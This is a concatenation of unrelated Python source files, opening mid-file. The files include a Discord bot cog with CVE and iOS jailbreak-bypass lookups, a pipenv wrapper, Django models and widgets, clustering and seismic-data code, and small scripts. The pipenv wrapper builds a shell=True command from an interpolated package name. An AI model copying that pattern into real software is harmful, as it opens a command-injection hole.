async def on_timeout(self):
self.disabled = True
self.placeholder = "Timed out"
await self.ctx.edit(view=self._view)
def format_bypass_page(ctx, entries, current_page, all_pages):
ctx.current_bypass = entries[0]
embed = discord.Embed(title=ctx.app.get(
"name"), color=discord.Color.blue())
embed.set_thumbnail(url=ctx.app.get("icon"))
embed.description = f"You can use **{ctx.current_bypass.get('name')}**!"
if ctx.current_bypass.get("notes") is not None:
embed.add_field(name="Note", value=ctx.current_bypass.get('notes'))
embed.color = discord.Color.orange()
if ctx.current_bypass.get("version") is not None:
embed.add_field(name="Supported versions",
value=f"This bypass works on versions {ctx.current_bypass.get('version')} of the app")
embed.set_footer(
text=f"Powered by ios.cfw.guide • Bypass {current_page} of {len(all_pages)}")
return embed
class Misc(commands.Cog):
def __init__(self, bot):
self.bot = bot
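        # Rate limit for /jumbo when used by non-mods outside the bot spam channel:
        # at most 3 invocations per 15 seconds per channel.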
self.spam_cooldown = commands.CooldownMapping.from_cooldown(
3, 15.0, commands.BucketType.channel)
try:
with open('emojis.json') as f:
self.emojis = json.loads(f.read())
except:
raise Exception(
"Could not find emojis.json. Make sure to run scrape_emojis.py")
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Send yourself a reminder after a given time gap")
async def remindme(self, ctx: BlooContext, reminder: Option(str, description="What do you want to be reminded?"), duration: Option(str, description="When do we remind you? (i.e 1m, 1h, 1d)")):
"""Sends you a reminder after a given time gap
Example usage
-------------
/remindme 1h bake the cake
Parameters
----------
    duration : str
        "How long to wait before sending the reminder (e.g. 1m, 1h, 1d)"
reminder : str
"What to remind you of"
"""
now = datetime.datetime.now()
delta = pytimeparse.parse(duration)
if delta is None:
raise commands.BadArgument(
"Please give me a valid time to remind you! (i.e 1h, 30m)")
time = now + datetime.timedelta(seconds=delta)
if time < now:
raise commands.BadArgument("Time has to be in the future >:(")
reminder = discord.utils.escape_markdown(reminder)
ctx.tasks.schedule_reminder(ctx.author.id, reminder, time)
# natural_time = humanize.naturaldelta(
# delta, minimum_unit='seconds')
embed = discord.Embed(title="Reminder set", color=discord.Color.random(
), description=f"We'll remind you {discord.utils.format_dt(time, style='R')}")
await ctx.respond(embed=embed, ephemeral=ctx.whisper, delete_after=5)
@slash_command(guild_ids=[cfg.guild_id], description="Post large version of a given emoji")
async def jumbo(self, ctx: BlooContext, emoji: str):
"""Posts large version of a given emoji
Example usage
-------------
/jumbo <emote>
Parameters
----------
emoji : str
"Emoji to enlarge"
"""
# non-mod users will be ratelimited
bot_chan = guild_service.get_guild().channel_botspam
if not permissions.has(ctx.guild, ctx.author, 5) and ctx.channel.id != bot_chan:
bucket = self.spam_cooldown.get_bucket(ctx.interaction)
if bucket.update_rate_limit():
raise commands.BadArgument("This command is on cooldown.")
# is this a regular Unicode emoji?
try:
em = await commands.PartialEmojiConverter().convert(ctx, emoji)
except commands.PartialEmojiConversionFailure:
em = emoji
if isinstance(em, str):
async with ctx.typing():
emoji_url_file = self.emojis.get(em)
if emoji_url_file is None:
raise commands.BadArgument(
"Couldn't find a suitable emoji.")
im = Image.open(io.BytesIO(base64.b64decode(emoji_url_file)))
                image_container = io.BytesIO()
                im.save(image_container, 'png')
                image_container.seek(0)
                _file = discord.File(image_container, filename='image.png')
await ctx.respond(file=_file)
else:
await ctx.respond(em.url)
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Get avatar of another user or yourself.")
async def avatar(self, ctx: BlooContext, member: Option(discord.Member, description="User to get avatar of", required=False)) -> None:
"""Posts large version of a given emoji
Example usage
-------------
/avatar member:<member>
Parameters
----------
member : discord.Member, optional
"Member to get avatar of"
"""
if member is None:
member = ctx.author
await self.handle_avatar(ctx, member)
@whisper()
@user_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_rc(self, ctx: BlooContext, member: discord.Member):
await self.handle_avatar(ctx, member)
@whisper()
@message_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_msg(self, ctx: BlooContext, message: discord.Message):
await self.handle_avatar(ctx, message.author)
async def handle_avatar(self, ctx, member: discord.Member):
embed = discord.Embed(title=f"{member}'s avatar")
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
avatar = member.avatar or member.default_avatar
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if member.display_avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
embed.set_image(url=avatar.replace(size=4096))
embed.color = discord.Color.random()
view = PFPView(ctx)
if member.guild_avatar is not None:
view.add_item(PFPButton(ctx, member))
view.message = await ctx.respond(embed=embed, ephemeral=ctx.whisper, view=view)
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="View information about a CVE")
async def cve(self, ctx: BlooContext, id: str):
"""View information about a CVE
Example usage
-------------
/cve <id>
Parameters
----------
id : str
"ID of CVE to lookup"
"""
try:
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'https://cve.circl.lu/api/cve/{id}', encoded=True)) as resp:
response = json.loads(await resp.text())
embed = discord.Embed(title=response.get(
'id'), color=discord.Color.random())
embed.description = response.get('summary')
embed.add_field(name="Published", value=response.get(
'Published'), inline=True)
embed.add_field(name="Last Modified",
value=response.get('Modified'), inline=True)
embed.add_field(name="Complexity", value=response.get(
'access').get('complexity').title(), inline=False)
embed.set_footer(text="Powered by https://cve.circl.lu")
await ctx.respond(embed=embed, ephemeral=ctx.whisper)
except Exception:
raise commands.BadArgument("Could not find CVE.")
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Find out how to bypass jailbreak detection for an app")
async def bypass(self, ctx: BlooContext, app: Option(str, description="Name of the app", autocomplete=bypass_autocomplete)):
await ctx.defer(ephemeral=ctx.whisper)
data = await get_ios_cfw()
bypasses = data.get('bypass')
matching_apps = [body for _, body in bypasses.items() if app.lower() in body.get("name").lower()]
if not matching_apps:
raise commands.BadArgument(
"The API does not recognize that app or there are no bypasses available.")
# matching_app = bypasses[matching_apps[0]]
# print(matching_app)
if len(matching_apps) > 1:
view = discord.ui.View(timeout=30)
apps = matching_apps[:25]
apps.sort(key=lambda x: x.get("name"))
menu = BypassDropdown(ctx, apps)
view.add_item(menu)
view.on_timeout = menu.on_timeout
embed = discord.Embed(
description="Which app would you like to view bypasses for?", color=discord.Color.blurple())
await ctx.respond(embed=embed, view=view, ephemeral=ctx.whisper)
else:
ctx.app = matching_apps[0]
bypasses = ctx.app.get("bypasses")
if not bypasses or bypasses is None or bypasses == [None]:
raise commands.BadArgument(
f"{ctx.app.get('name')} has no bypasses.")
menu = BypassMenu(ctx, ctx.app.get(
"bypasses"), per_page=1, page_formatter=format_bypass_page, whisper=ctx.whisper)
await menu.start()
@slash_command(guild_ids=[cfg.guild_id], description="Post the embed for one of the rules")
async def rule(self, ctx: BlooContext, title: Option(str, autocomplete=rule_autocomplete), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
if title not in self.bot.rule_cache.cache:
potential_rules = [r for r in self.bot.rule_cache.cache if title.lower() == r.lower(
) or title.strip() == f"{r} - {self.bot.rule_cache.cache[r].description}"[:100].strip()]
if not potential_rules:
raise commands.BadArgument(
"Rule not found! Title must match one of the embeds exactly, use autocomplete to help!")
title = potential_rules[0]
embed = self.bot.rule_cache.cache[title]
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
await ctx.respond_or_edit(content=title, embed=embed)
@slash_command(guild_ids=[cfg.guild_id], description="Get the topic for a channel")
async def topic(self, ctx: BlooContext, channel: Option(discord.TextChannel, description="Channel to get the topic from", required=False), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
"""get the channel's topic"""
channel = channel or ctx.channel
if channel.topic is None:
raise commands.BadArgument(f"{channel.mention} has no topic!")
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
embed = discord.Embed(title=f"#{channel.name}'s topic",
description=channel.topic, color=discord.Color.blue())
await ctx.respond_or_edit(content=title, embed=embed)
@mod_and_up()
@slash_command(guild_ids=[cfg.guild_id], description="Start a poll", permissions=slash_perms.mod_and_up())
async def poll(self, ctx: BlooContext, question: str, channel: Option(discord.TextChannel, required=False, description="Where to post the message") = None):
if channel is None:
channel = ctx.channel
embed=discord.Embed(description=question, color=discord.Color.random())
embed.timestamp = datetime.datetime.now()
embed.set_footer(text=f"Poll started by {ctx.author}")
message = await channel.send(embed=embed)
emojis = ['⬆️', '⬇️']
for emoji in emojis:
await message.add_reaction(emoji)
ctx.whisper = True
await ctx.send_success("Done!")
@slash_command(guild_ids=[cfg.guild_id], description="View the status of various Discord features")
@commands.guild_only()
async def dstatus(self, ctx):
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/components.json") as resp:
if resp.status == 200:
components = await resp.json()
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/incidents.json") as resp:
if resp.status == 200:
incidents = await resp.json()
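        # NOTE: the indices below assume a fixed ordering of the 'components' list
        # returned by the status API; the trailing comments name the component each
        # index is expected to correspond to.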
api_status = components.get('components')[0].get('status').title() # API
mp_status = components.get('components')[4].get('status').title() # Media Proxy
pn_status = components.get('components')[6].get('status').title() # Push Notifications
s_status = components.get('components')[8].get('status').title() # Search
v_status = components.get('components')[11].get('status').title() # Voice
cf_status = components.get('components')[2].get('status').title() # Cloudflare
title = "All Systems Operational" if api_status == "Operational" and mp_status == "Operational" and pn_status == "Operational" and s_status == "Operational" and v_status == "Operational" and cf_status == "Operational" else "Known Incident"
color = discord.Color.green() if title == "All Systems Operational" else discord.Color.orange()
last_incident = incidents.get('incidents')[0].get('name')
last_status = incidents.get('incidents')[0].get('status').title()
last_created = datetime.datetime.strptime(incidents.get('incidents')[0].get('created_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_update = datetime.datetime.strptime(incidents.get('incidents')[0].get('updated_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_impact = incidents.get('incidents')[0].get('impact')
online = '<:status_online:942288772551278623>'
offline = '<:status_dnd:942288811818352652>'
incident_icons = {'none': '<:status_offline:942288832051679302>',
'maintenance': '<:status_total:942290485916073995>',
'minor': '<:status_idle:942288787000680499>',
'major': '<:status_dnd:942288811818352652>',
'critical': '<:status_dnd:942288811818352652>'}
embed = discord.Embed(title=title, description=f"""
{online if api_status == 'Operational' else offline} **API:** {api_status}
{online if mp_status == 'Operational' else offline} **Media Proxy:** {mp_status}
{online if pn_status == 'Operational' else offline} **Push Notifications:** {pn_status}
{online if s_status == 'Operational' else offline} **Search:** {s_status}
{online if v_status == 'Operational' else offline} **Voice:** {v_status}
{online if cf_status == 'Operational' else offline} **Cloudflare:** {cf_status}
__**Last outage information**__
**Incident:** {incident_icons.get(last_impact)} {last_incident}
**Status:** {online if last_status == 'Resolved' else offline} {last_status}
**Identified at:** {format_dt(last_created, style='F')}
**{'Resolved at' if last_status == 'Resolved' else 'Last updated'}:** {format_dt(last_update, style='F')}
""", color=color)
embed.set_footer(text="Powered by discordstatus.com")
await ctx.respond(embed=embed)
@topic.error
@rule.error
@poll.error
@bypass.error
@cve.error
@dstatus.error
@remindme.error
@jumbo.error
@avatar.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
if (isinstance(error, commands.MissingRequiredArgument)
or isinstance(error, PermissionsFailure)
or isinstance(error, commands.BadArgument)
or isinstance(error, commands.BadUnionArgument)
or isinstance(error, commands.MissingPermissions)
or isinstance(error, commands.BotMissingPermissions)
or isinstance(error, commands.MaxConcurrencyReached)
or isinstance(error, commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@109705860275539968> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Misc(bot))
|
30493
|
import os
import shutil
import subprocess
from possum.exc import PipenvPathNotFound
class PipenvWrapper:
def __init__(self):
self.pipenv_path = shutil.which('pipenv')
if not self.pipenv_path:
raise PipenvPathNotFound
# Force pipenv to ignore any currently active pipenv environment
os.environ['PIPENV_IGNORE_VIRTUALENVS'] = '1'
@property
def venv_path(self):
return self.get_virtual_environment_path()
def create_virtual_environment(self):
p = subprocess.Popen(
[self.pipenv_path, '--three'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
p.communicate()
def get_virtual_environment_path(self):
p = subprocess.Popen(
[self.pipenv_path, '--venv'],
stdout=subprocess.PIPE
)
result = p.communicate()
return result[0].decode('ascii').strip('\n')
def get_site_packages(self):
return subprocess.check_output(
[
'pipenv', 'run', 'python', '-c',
'from distutils.sysconfig import get_python_lib; '
'print(get_python_lib())'
],
universal_newlines=True
).strip()
def install_packages(self):
p = subprocess.Popen(
[self.pipenv_path, 'install'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def remove_virtualenv(self):
p = subprocess.Popen(
[self.pipenv_path, '--rm'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def check_package_title(self, package):
try:
# Yes, this needs to be better, but performing this one-liner
# though the Pipenv environment of the project only seems to work
# when 'shell=True' is set.
return subprocess.check_output(
f'{self.pipenv_path} run python -c "import '
f'{package}; print({package}.__title__)"',
shell=True, universal_newlines=True
).strip()
except subprocess.CalledProcessError:
return package
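# Illustrative usage (assumes pipenv is installed and on PATH):
#   wrapper = PipenvWrapper()
#   wrapper.create_virtual_environment()
#   wrapper.install_packages()
#   print(wrapper.venv_path)
#   print(wrapper.get_site_packages())
#   wrapper.remove_virtualenv()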
|
30498
|
class O(object): pass
class A(O): pass
class B(O): pass
class C(O): pass
class D(O): pass
class E(O): pass
class K1(A,B,C): pass
class K2(D,B,E): pass
class K3(D,A): pass
class Z(K1,K2,K3): pass
print K1.__mro__
print K2.__mro__
print K3.__mro__
print Z.__mro__
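# Expected C3 linearizations, for reference:
#   K1: K1, A, B, C, O, object
#   K2: K2, D, B, E, O, object
#   K3: K3, D, A, O, object
#   Z:  Z, K1, K2, K3, D, A, B, C, E, O, object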
|
30507
|
from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from django.db.models import Q
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
TARGET_FKEY_ATTRS = dict(
null=True,
blank=True,
on_delete=models.SET_NULL,
)
class Entry(models.Model):
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
created_by = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.SET_NULL,
null=True,
blank=True,
)
entry_type = models.CharField(max_length=255)
context = models.CharField(
max_length=1024,
blank=True,
default='',
verbose_name=_('Context'),
help_text=_('The URL of the view in which the event occurred.'),
)
ip_address = models.CharField(
max_length=48,
blank=True,
default='',
verbose_name=_('IP address'),
help_text=_('The IP address this action was performed from.'),
)
# various target fkeys, sparse
event = models.ForeignKey('core.Event', **TARGET_FKEY_ATTRS)
person = models.ForeignKey('core.Person', **TARGET_FKEY_ATTRS)
organization = models.ForeignKey('core.Organization', **TARGET_FKEY_ATTRS)
feedback_message = models.ForeignKey('feedback.FeedbackMessage', **TARGET_FKEY_ATTRS)
event_survey_result = models.ForeignKey('surveys.EventSurveyResult', **TARGET_FKEY_ATTRS)
global_survey_result = models.ForeignKey('surveys.GlobalSurveyResult', **TARGET_FKEY_ATTRS)
search_term = models.CharField(max_length=255, blank=True, default='')
# we should probably have shoved them in a jsonfield in the first place
other_fields = JSONField(blank=True, default=dict)
@property
def survey_result(self):
"""
Shortcut for templates etc. that apply to both GlobalSurveyResults and EventSurveyResults.
"""
return self.event_survey_result if self.event_survey_result else self.global_survey_result
@property
def cbac_claims(self):
return ", ".join(f"{key}={value}" for (key, value) in self.other_fields.get("claims", {}).items())
@property
def signup(self):
from labour.models import Signup
if not self.event or not self.person:
return None
try:
return Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
return None
def send_updates(self):
from .subscription import Subscription
q = Q(entry_type=self.entry_type, active=True)
# TODO need a more flexible filter solution that does not hard-code these
# One option would be to specify filter = JSONField in Subscription.
# Implementing this filter would require a client-side check or one SQL query
# per Subscription, however, as we query Subscriptions by Entry and not vice versa.
if self.event:
# Implement the event filter. Subscriptions without event_filter receive updates from
# all events. Subscriptions with event_filter receive only updates from that event.
q &= Q(event_filter=self.event) | Q(event_filter__isnull=True)
if self.event_survey_result:
# Implement event survey filter.
survey = self.event_survey_result.survey
q &= Q(event_survey_filter=survey) | Q(event_survey_filter__isnull=True)
if self.event and self.person:
# Implement job category filter
from labour.models import Signup
try:
signup = Signup.objects.get(event=self.event, person=self.person)
except Signup.DoesNotExist:
pass
else:
q &= (
Q(job_category_filter__in=signup.job_categories.all()) |
Q(job_category_filter__in=signup.job_categories_accepted.all()) |
Q(job_category_filter__isnull=True)
)
for subscription in Subscription.objects.filter(q):
subscription.send_update_for_entry(self)
@property
def entry_type_metadata(self):
if not hasattr(self, '_entry_type_metadata'):
from .. import registry
self._entry_type_metadata = registry.get(self.entry_type)
return self._entry_type_metadata
@property
def email_reply_to(self):
meta = self.entry_type_metadata
if callable(meta.email_reply_to):
return meta.email_reply_to(self)
else:
return meta.email_reply_to
@property
def message(self):
meta = self.entry_type_metadata
if callable(meta.message):
return meta.message(self)
else:
return meta.message.format(entry=self)
@property
def email_subject(self):
return '[{app_name}] {message}'.format(
app_name=settings.KOMPASSI_INSTALLATION_NAME,
message=self.message,
)
@property
def email_body(self):
meta = self.entry_type_metadata
if callable(meta.email_body_template):
return meta.email_body_template(self)
else:
return render_to_string(meta.email_body_template, dict(
entry=self,
settings=settings,
))
class Meta:
verbose_name = _('log entry')
verbose_name_plural = _('log entries')
ordering = ('-created_at',)
|
30522
|
import mimetypes
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core import signing
from django.forms import widgets
from django.forms.utils import flatatt
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils.translation import ugettext_lazy as _
from djng import app_settings
class DropFileWidget(widgets.Widget):
signer = signing.Signer()
def __init__(self, area_label, fileupload_url, attrs=None):
self.area_label = area_label
self.fileupload_url = fileupload_url
super(DropFileWidget, self).__init__(attrs)
self.filetype = 'file'
def render(self, name, value, attrs=None, renderer=None):
from django.contrib.staticfiles.storage import staticfiles_storage
extra_attrs = dict(attrs)
extra_attrs.update({
'name': name,
'class': 'djng-{}-uploader'.format(self.filetype),
'djng-fileupload-url': self.fileupload_url,
'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
})
self.update_attributes(extra_attrs, value)
final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
        # add a spinning wheel
spinner_attrs = {
'class': 'glyphicon glyphicon-refresh glyphicon-spin',
'ng-cloak': True,
}
elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
# add a delete icon
icon_attrs = {
'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
'class': 'djng-btn-trash',
'title': _("Delete File"),
'djng-fileupload-button ': True,
'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
'ng-cloak': True,
}
elements.append(format_html('<img {} />', flatatt(icon_attrs)))
# add a download icon
if value:
download_attrs = {
'href': value.url,
'class': 'djng-btn-download',
'title': _("Download File"),
'download': True,
'ng-cloak': True,
}
download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
def update_attributes(self, attrs, value):
if value:
try:
content_type, _ = mimetypes.guess_type(value.file.name)
extension = mimetypes.guess_extension(content_type)[1:]
except (IOError, IndexError, TypeError):
extension = '_blank'
background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
class DropImageWidget(DropFileWidget):
def __init__(self, area_label, fileupload_url, attrs=None):
super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
self.filetype = 'image'
def update_attributes(self, attrs, value):
if value:
background_url = self.get_background_url(value)
if background_url:
attrs.update({
'style': 'background-image: url({});'.format(background_url),
'current-file': self.signer.sign(value.name)
})
def get_background_url(self, value):
from easy_thumbnails.exceptions import InvalidImageFormatError
from easy_thumbnails.files import get_thumbnailer
try:
thumbnailer = get_thumbnailer(value)
thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
return thumbnail.url
except InvalidImageFormatError:
return
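# Hedged usage sketch: wiring the widgets above into a Django form. The form and
# field names and the '/upload/' endpoint are illustrative assumptions; only the
# widget constructors defined above are taken as given.
from django import forms
class UploadForm(forms.Form):
    attachment = forms.FileField(
        required=False,
        widget=DropFileWidget(
            area_label=_('Drop a file here or click to browse'),
            fileupload_url='/upload/',  # hypothetical endpoint
        ),
    )
    picture = forms.ImageField(
        required=False,
        widget=DropImageWidget(
            area_label=_('Drop an image here'),
            fileupload_url='/upload/',  # hypothetical endpoint
        ),
    )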
|
30565
|
import datetime
import unittest
class KalmanFilterTest(unittest.TestCase):
def test_kalman_filter_with_prior_predict(self):
t0 = datetime.datetime(2014, 2, 12, 16, 18, 25, 204000)
print(t0)
self.assertEqual(1., 1.)
def test_kalman_filter_without_prior_predict(self):
pass
def test_kalman_filter_with_low_variance_observation(self):
pass
def test_kalman_filter_multidim(self):
pass
if __name__ == '__main__':
unittest.main()
|
30595
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import os
from datasets import convert_data
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('data_type', None,
'The type of the dataset to convert, need to be either "train" or "test".')
tf.app.flags.DEFINE_string('dataset_dir', None,
'The directory where the image files are saved.')
tf.app.flags.DEFINE_string('output_dir', None,
'The directory where the output TFRecords are saved.')
tf.app.flags.DEFINE_string('filename', None,
'The txt file where the list all image files to be converted.')
tf.app.flags.DEFINE_integer('num_tfrecords', 1,
'Number of tfrecords to convert.')
def main(_):
    # check if dir exists and make it
directory = FLAGS.output_dir
if not os.path.exists(directory):
os.makedirs(directory)
# start convert data to tfrecords
convert_data.run(dataset_dir=FLAGS.dataset_dir,
output_dir=FLAGS.output_dir,
filename=FLAGS.filename,
data_type=FLAGS.data_type,
num_tfrecords=FLAGS.num_tfrecords)
if __name__ == '__main__':
tf.app.run()
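# Hedged invocation sketch; the script name and all paths below are placeholders,
# not values taken from the flags above:
#
#   python convert_to_tfrecords.py \
#       --data_type=train \
#       --dataset_dir=/path/to/images \
#       --output_dir=/path/to/tfrecords \
#       --filename=/path/to/train_list.txt \
#       --num_tfrecords=4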
|
30597
|
import logging
import numpy as np
from bico.geometry.point import Point
from bico.nearest_neighbor.base import NearestNeighbor
from bico.utils.ClusteringFeature import ClusteringFeature
from datetime import datetime
from typing import Callable, TextIO, List
logger = logging.getLogger(__name__)
class BICONode:
def __init__(self, level: int, dim: int, proj: int, bico: 'BICO',
projection_func: Callable[[int, int, float], NearestNeighbor]):
self.level = level
self.dim = dim
self.proj = proj
self.point_to_biconode = []
self.projection_func = projection_func
self.nn_engine = projection_func(dim, proj, bico.get_radius(self.level))
self.num_cfs = 0
self.bico = bico
self.cf = ClusteringFeature(Point(np.zeros(dim)), Point(np.zeros(dim)), 0, 0)
def insert_point(self, point_cf: ClusteringFeature) -> int:
if self.bico.verbose:
logger.debug("Insert point: {}".format(point_cf))
# check whether geometry fits into CF
if self.level > 0:
if self.cf.size == 0:
self.cf += point_cf
self.cf.ref = point_cf.ref
else:
test = self.cf + point_cf
cost = test.kmeans_cost(self.cf.ref)
if self.bico.verbose:
logger.debug("Cost: " + str(cost) + ", Thresh: " + str(self.bico.get_threshold(self.level)))
if cost < self.bico.get_threshold(self.level):
self.cf = test
return 0
# search nearest neighbor and insert geometry there or open new BICONode
candidates = []
if self.num_cfs > 0:
if self.bico.track_time:
tstart = datetime.now()
candidates = self.nn_engine.get_candidates(point_cf.ref.p)
# candidates = self.ann_engine.neighbours(point_cf.ref.p)
if self.bico.track_time:
tend = datetime.now()
if len(self.bico.time) < self.level + 1:
self.bico.time.append(tend - tstart)
else:
self.bico.time[self.level] += tend - tstart
if len(candidates) == 0:
if self.bico.verbose:
logger.debug("No nearest neighbor found.")
self.num_cfs += 1
self.nn_engine.insert_candidate(point=point_cf.ref.p, metadata=self.num_cfs)
# self.ann_engine.store_vector(point_cf.ref.p, data=self.num_cfs)
new_node = BICONode(self.level + 1, self.dim, self.proj, self.bico, self.projection_func)
# new_node.cf = ClusteringFeature(geometry, geometry, geometry*geometry, 1)
new_node.cf = point_cf
# debug
if len(self.point_to_biconode) != self.num_cfs - 1:
logger.error("Something is wrong: {} != {}".format(len(self.point_to_biconode), self.num_cfs - 1))
self.point_to_biconode.append(new_node)
return 1
else:
if self.bico.verbose:
logger.debug(str(len(candidates)) + " nearest neighbor found!")
logger.debug(candidates)
nearest = candidates[0]
node = nearest.data # contains the index
# sanity check
if len(self.point_to_biconode) < node - 2:
logger.error("Something is wrong: {} > {}".format(len(self.point_to_biconode), node - 2))
return self.point_to_biconode[node - 1].insert_point(point_cf)
def output_cf(self, f: TextIO) -> None:
if self.level > 0:
f.write(str(self.cf) + "\n")
for node in self.point_to_biconode:
node.output_cf(f)
def get_cf(self) -> List[np.ndarray]:
cur = []
if self.level > 0:
cur.append(np.insert(self.cf.center().p, 0, self.cf.size))
for node in self.point_to_biconode:
cur = cur + node.get_cf()
return cur
|
30674
|
from django.core.exceptions import SuspiciousOperation
from django.core.signing import Signer, BadSignature
from django.forms import HiddenInput
signer = Signer()
class SignedHiddenInput(HiddenInput):
def __init__(self, include_field_name=True, attrs=None):
self.include_field_name = include_field_name
super(SignedHiddenInput, self).__init__(attrs=attrs)
def value_from_datadict(self, data, files, name):
value = super(SignedHiddenInput, self).value_from_datadict(data, files, name)
try:
value = signer.unsign(value)
except BadSignature:
raise SuspiciousOperation()
if self.include_field_name:
name_key = '{0}-'.format(name)
if not value.startswith(name_key):
raise SuspiciousOperation()
value = value.replace(name_key, '', 1)
return value
def render(self, name, value, attrs=None):
value = self.sign_value(name, value)
return super(SignedHiddenInput, self).render(name, value, attrs=attrs)
def sign_value(self, name, value):
if self.include_field_name:
value = '-'.join(map(str, [name, value]))
value = signer.sign(value)
return value
def value(self):
pass
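# Hedged usage sketch: a form carrying a signed, tamper-evident hidden value. The
# form and field names are illustrative assumptions; only SignedHiddenInput above
# is taken as given.
from django import forms
class ConfirmActionForm(forms.Form):
    object_id = forms.CharField(widget=SignedHiddenInput())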
|
30690
|
from typing import Union
from scipy.spatial.qhull import Delaunay
from shapely.geometry import LineString
from subsurface.structs.base_structures import StructuredData
import numpy as np
try:
import segyio
segyio_imported = True
except ImportError:
segyio_imported = False
def read_in_segy(filepath: str, coords=None) -> StructuredData:
"""Reader for seismic data stored in sgy/segy files
Args:
filepath (str): the path of the sgy/segy file
coords (dict): If data is a numpy array coords provides the values for
the xarray dimension. These dimensions are 'x', 'y' and 'z'
Returns: a StructuredData object with data, the traces with samples written into an xr.Dataset, optionally with
labels defined by coords
"""
segyfile = segyio.open(filepath, ignore_geometry=True)
data = np.asarray([np.copy(tr) for tr in segyfile.trace[:]])
sd = StructuredData.from_numpy(data) # data holds traces * (samples per trace) values
segyfile.close()
return sd
def create_mesh_from_coords(coords: Union[dict, LineString],
zmin: Union[float, int], zmax: Union[float, int] = 0.0):
"""Creates a mesh for plotting StructuredData
Args:
coords (Union[dict, LineString]): the x and y, i.e. latitude and longitude, location of the traces of the seismic profile
zmax (float): the maximum elevation of the seismic profile, by default 0.0
zmin (float): the location in z where the lowest sample was taken
Returns: vertices and faces for creating an UnstructuredData object
"""
if type(coords) == LineString:
linestring = coords
n = len(list(linestring.coords))
coords = np.array([[x[0] for x in list(linestring.coords)],
[y[1] for y in list(linestring.coords)]]).T
else:
n = len(coords['x'])
coords = np.array([coords['x'],
coords['y']]).T
# duplicating the line, once with z=lower and another with z=upper values
vertices = np.zeros((2*n, 3))
vertices[:n, :2] = coords
vertices[:n, 2] = zmin
vertices[n:, :2] = coords
vertices[n:, 2] = zmax
# i+n --- i+n+1
# |\ |
# | \ |
# | \ |
# | \ |
# i --- i+1
tri = Delaunay(vertices[:, [0, 2]])
faces = tri.simplices
return vertices, faces
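# Hedged usage sketch for create_mesh_from_coords with a made-up three-trace
# profile; the coordinates and zmin are illustrative only, and read_in_segy is not
# exercised here because it needs a real .sgy file plus the optional segyio package.
if __name__ == '__main__':
    example_coords = {'x': [0.0, 100.0, 200.0], 'y': [0.0, 50.0, 100.0]}
    vertices, faces = create_mesh_from_coords(example_coords, zmin=-500.0, zmax=0.0)
    print(vertices.shape, faces.shape)  # (6, 3) and (n_triangles, 3)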
|
30696
|
from pylayers.gis.layout import *
from pylayers.antprop.signature import *
from pylayers.antprop.channel import *
import pylayers.signal.waveform as wvf
import networkx as nx
import numpy as np
import time
import logging
L = Layout('WHERE1_clean.ini')
#L = Layout('defstr2.ini')
try:
L.dumpr()
except:
L.build()
L.dumpw()
#L.build()
#L.dumpw()
#L.buildGi()
nc1 = 6#5
nc2 = 25#37
poly1 = L.Gt.node[nc1]['polyg']
cp1 = poly1.centroid.xy
poly2 = L.Gt.node[nc2]['polyg']
cp2 = poly2.centroid.xy
ptx = np.array([cp1[0][0],cp1[1][0],1.5])
prx = np.array([cp2[0][0]+0.5,cp2[1][0]+0.5,1.5])
print ptx
print prx
